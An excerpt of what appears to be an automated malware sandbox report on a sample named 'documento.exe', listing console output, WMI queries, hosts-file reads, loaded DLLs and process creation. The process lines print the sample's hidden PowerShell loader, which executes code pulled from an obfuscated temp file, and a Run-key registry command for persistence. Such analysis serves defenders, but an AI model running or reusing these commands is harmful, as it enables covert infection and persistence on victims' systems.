              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......D.......hV......................o.n.t.e.........(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................2.4.....(.P.....`.......h.......\........Y.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....`.......h.......\........Y.........................s............(...............................Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................d.........................s............................................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................#d.........................s............8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................s.t.r.i.n.g.....t.......................5d.........................s............8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................Ad.........................s............8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.1.......Sd.........................s............8.......".......x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t......................._d.........................s............8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................qd.........................s....................Z.......x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................}d.........................s............8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................d.........................s....................Z.......x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................d.........................s............8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................d.........................s............................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................d.........................s............8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .l.i.d.a.t.i.o.n.E.x.c.e.p.t.i.o.n..d.........................s............8.......(.......x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................d.........................s............8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................d.........................s............................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................d.........................s............8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e.........................s....................l.......x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e.........................s............8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....t.......................(e.........................s............8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................4e.........................s............8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................C.o.p.y.-.I.t.e.m. .:. .C.a.n.n.o.t. .o.v.e.r.w.r.i.t.e. .t.h.e. .i.t.e.m. .....8.......L.......................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e...................... .i.t.e.........8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e...................... .i.t.e.........................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e...................... .i.t.e.........8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........e...................... .i.t.e.........8....... .......x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e...................... .i.t.e.........8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e...................... .i.t.e.........................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e...................... .i.t.e.........8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................e...................... .i.t.e.........................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................f...................... .i.t.e.........8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................f...................... .i.t.e.........................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t......................."f...................... .i.t.e.........8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .t.r.i.n.g.). .[.C.o.p.y.-.I.t.e.m.].,. .I.O.E.x.c.e.p.t.i.o.n.t.e.........8.......D.......x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................@f......................o.n.t.e.........8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................Rf......................o.n.t.e.........................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................^f......................o.n.t.e.........8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .C.o.m.m.a.n.d.....................pf......................o.n.t.e.........8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t.......................|f......................o.n.t.e.........8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....t........................f......................o.n.t.e.........8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t........................f......................o.n.t.e.........8...............x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................2.4.....(.P.....t...............@........g.........................s............8...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....t...............@........g.........................s............8...............x...............
              Source: documento.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\documento.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\documento.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: documento.exeReversingLabs: Detection: 45%
              Source: documento.exeVirustotal: Detection: 29%
              Source: C:\Users\user\Desktop\documento.exeFile read: C:\Users\user\Desktop\documento.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\documento.exe "C:\Users\user\Desktop\documento.exe"
              Source: C:\Users\user\Desktop\documento.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Preeternal)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Preeternal)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Users\user\Desktop\documento.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Users\user\Desktop\documento.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\Desktop\documento.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\Desktop\documento.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\documento.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\documento.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\documento.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\documento.exeSection loaded: fms.dllJump to behavior
              Source: C:\Users\user\Desktop\documento.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\Desktop\documento.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: webio.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: shcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
